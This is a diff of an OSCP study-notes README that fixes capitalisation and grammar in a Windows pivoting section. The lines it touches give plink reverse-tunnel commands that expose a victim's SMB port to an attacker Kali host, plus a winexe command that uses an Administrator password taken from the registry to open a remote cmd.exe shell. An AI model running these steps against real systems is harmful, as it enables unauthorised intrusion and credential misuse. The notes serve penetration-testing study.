AbdullahZuhair21/OSCP-Notes/README.md

 -     service ssh restart && service ssh enable
 - from the Windows machine
 -     plink.exe -l <KaliUser> -pw <KaliPasswd> -R <ServicePort in Windows>:127.0.0.1:<KaliPort> <KaliIP>
-- assume windows has a local smb service running on 445 and your kali machine is 10.10.16.9. if you have credentials you can use tool like psexec to login but if you don't have use the following tunneling
+- assume windows has a local SMB service running on 445 and your Kali machine is 10.10.16.9. if you have credentials you can use a tool like psexec to login but if you don't have, use the following tunneling
 -     plink.exe -l raman -pw to0or -R 445:127.0.0.1:445 10.10.16.9
 - keep on hitting enter and you will get a root shell (this is the windows machine not kali machine)
-- now you need to use winexe tool to execute a command in windows
+- now you need to use winexe tool to execute a command in Windows
 -     winexe -U Administrator%<Password that you found in the registry> //127.0.0.1 "cmd.exe"
 - run the command multiple times if it doesn't work